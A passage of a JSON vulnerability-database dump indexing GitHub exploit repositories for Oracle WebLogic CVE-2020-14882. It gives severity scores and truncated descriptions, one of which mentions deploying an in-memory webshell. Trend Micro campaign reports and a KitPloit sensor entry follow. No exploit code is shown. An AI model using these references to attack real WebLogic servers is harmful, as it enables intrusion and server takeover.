"2022-08-17T04:51:16", "id": "E431282E-5250-58B8-B692-7D184D2EFF7E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-27T16:11:32", "description": "# CVE-2020-14882_Exploit_Gui\n\nCVE-2020-14882_Exploit \u652f\u630112.2.X\u548c10...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 
"NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-07T09:48:49", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-02-27T11:07:48", "id": "C7D1BCF0-3132-5507-B00B-E1843808D5B0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:21", "description": "# cve-2020-14882\nBash script to e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T13:53:31", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-03-18T23:46:12", "id": "CFACBEFA-7243-512E-844E-C19B75303CAA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:11:54", "description": "Thank you NS-Sp4ce\u3001Jas502n\u3001s1kr10s\u3001demon\u3001\u65af\u6587\nreference\uff1a\nhttps://g...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-09T08:03:44", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-11-16T03:38:04", "id": "693E6A69-453C-50C0-B2B1-91DD65E1D4FF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T12:23:46", "description": "# CVE-2020-14882\nCVE-2020\u201314882 - research by Jang\n\nCode by @s1k...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T21:28:12", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-08-15T05:39:24", "id": "C3F26791-EFA4-5899-9702-ACF5F8B70344", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:57:10", "description": "# CVE-2020-14882\n\n\n## coherence shellsession calc.exe\n\n```python...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-30T11:07:11", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-10-10T21:21:34", "id": "C27DDA07-4A5E-56D3-9950-FD5025E1B777", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:12", "description": "# cve-2020-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T13:12:28", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-07-01T07:17:20", "id": "01A53B41-499A-535B-8021-CB0329633F46", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:56:26", "description": "<b>[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-09T13:02:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-08-19T10:39:35", "id": "38ACEE5F-E30D-53CD-B59A-2467D332F915", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-13T20:22:18", "description": "# CVE-2020-14882\u90e8\u7f72\u51b0\u874e\u5185\u5b58\u9a6c\n\n\u4f17\u6240\u5468\u77e5\uff0cCVE-2020-14882\u662f\u4e00\u4e2a\u672a\u6388\u6743\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8be5\u6f0f\u6d1e\u5728...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-01-27T06:29:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-03-13T15:42:41", "id": "1B25AC3F-FC8A-51FF-BD1B-29BDB73E331D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:15", "description": "# CVE-2020-14882 checker\n CVE-2020-14882 detection script\n\nThis ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-03T11:34:38", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-03-18T23:48:22", "id": "EEEBEAEA-A8C9-5187-A9DA-A04745A62CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-19T04:14:43", "description": "# CVE-2020\u201314882 Weblogic Unauthorized bypass RCE\n\n## bypass pat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-28T11:43:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2022-03-18T22:57:43", "id": "07818DFF-3595-58BA-ABC4-AB5DCCE0B8DD", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:55:52", "description": "# CVE-2020-14882\n\n## Weblogic 10\n![weblogic ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-12T11:27:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2020-2020"], "modified": "2021-07-08T07:02:26", "id": "88E567D7-E197-549F-AE13-65809E68DBB3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-17T22:08:44", "description": "[CVE-2020-14883] Oracle WebLogic Server Authenticated Remote Cod...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-09T15:26:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2020-14883"], "modified": "2022-02-17T20:33:02", "id": "60F5B96E-ACB6-5D1D-8375-60BADF9503BC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:04:22", "description": "<h1 align=\"center\" >Welcome to CodeTest</h1>\n\n### :point_right:\u5173...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-30T01:55:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2555", "CVE-2020-14882"], "modified": "2021-11-14T02:41:21", "id": "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": 
"2022-01-19T00:36:28", "description": "# Detection of RCE in Oracle's \"WebLogic Server\" CVE-2020-14882 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-12T06:59:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2020-14750"], "modified": "2022-01-18T23:46:06", "id": "36B6DECF-DB78-5633-9665-AAA8EC3D2A76", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:56:18", "description": "# CVE-2020-14750\nPoC para las vulnerabilidades CVE-2020-14750 y ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-06T12:46:03", 
"type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Fusion Middleware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2021-12-08T09:11:33", "id": "79D8EEA6-4961-57CD-99C7-A3404C0B5307", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "trendmicroblog": [{"lastseen": "2022-09-14T10:03:34", "description": "This blog entry details how Trend Micro Cloud One\u2122 \u2013 Workload Security and Trend Micro Vision One\u2122 effectively detected and blocked the abuse of the CVE-2020-14882 WebLogic vulnerability in affected endpoints.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T00:00:00", "type": "trendmicroblog", "title": "A Post-exploitation Look at Coinminers Abusing WebLogic Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-09-14T00:00:00", "id": "TRENDMICROBLOG:64CE304907BCE85ADF8422301BEFF093", "href": "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-18T14:36:36", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", 
"CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T18:37:14", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-06-06T15:25:09", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEjoizJNl3LNYyyv9myMlsuI7gmP1E7MSM6weEMAwhxbOF9kmr-8waHDsvhRb2xdofgiYS6isSrf5JoaxaNA87i5DrBemJD6-WcYfcskbfGvG4MpCmR9POqdxJXSONqdrj2wqvFxph_mGP-aGyijgmGsohQIlkulxCW6J_W-raQ7iD_dq8KnkAGkhG1H>)\n\n \n\n\n# Melody\n\nMonitor the Internet's background noise\n\nMelody is a transparent internet sensor built for [threat intelligence](<https://www.kitploit.com/search/label/Threat%20Intelligence> \"threat intelligence\" ) and supported by a detection rule framework which allows you to tag packets of interest for further analysis and threat monitoring.\n\n \n\n\n# Features\n\nHere are some key features of Melody :\n\n * Transparent capture\n * Write detection rules and tag specific packets to analyze them at scale\n * Mock [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) websites using the builtin HTTP/S server\n * Supports the main internet protocols over IPv4 and IPv6\n * Handles log 